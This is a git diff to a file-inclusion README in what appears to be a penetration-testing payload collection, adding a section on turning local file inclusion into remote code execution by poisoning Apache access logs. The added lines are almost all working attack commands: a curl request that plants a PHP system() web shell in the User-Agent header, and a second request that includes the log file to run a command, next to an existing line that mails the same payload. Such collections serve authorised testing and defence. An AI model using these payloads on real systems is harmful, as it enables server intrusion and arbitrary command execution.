diff --git a/File Inclusion/README.md b/File Inclusion/README.md
index 8bb0a16..cc4a67f 100644
--- a/File Inclusion/README.md	
+++ b/File Inclusion/README.md	
@@ -345,6 +345,22 @@ In some cases you can also send the email with the `mail` command line.
 mail -s "<?php system($_GET['cmd']);?>" www-data@10.10.10.10. < /dev/null
 ```
 
+### RCE via Apache logs
+
+Poison the User-Agent in access logs:
+
+```
+$ curl http://example.org/ -A "<?php system(\$_GET['cmd']);?>"
+```
+
+Note: The logs will escape double quotes so use single quotes for strings in the PHP payload.
+
+Then request the logs via the LFI and execute your command.
+
+```
+$ curl http://example.org/test.php?page=/var/log/apache2/access.log&cmd=id
+```
+
 ## LFI to RCE via PHP sessions
 
 Check if the website use PHP Session (PHPSESSID)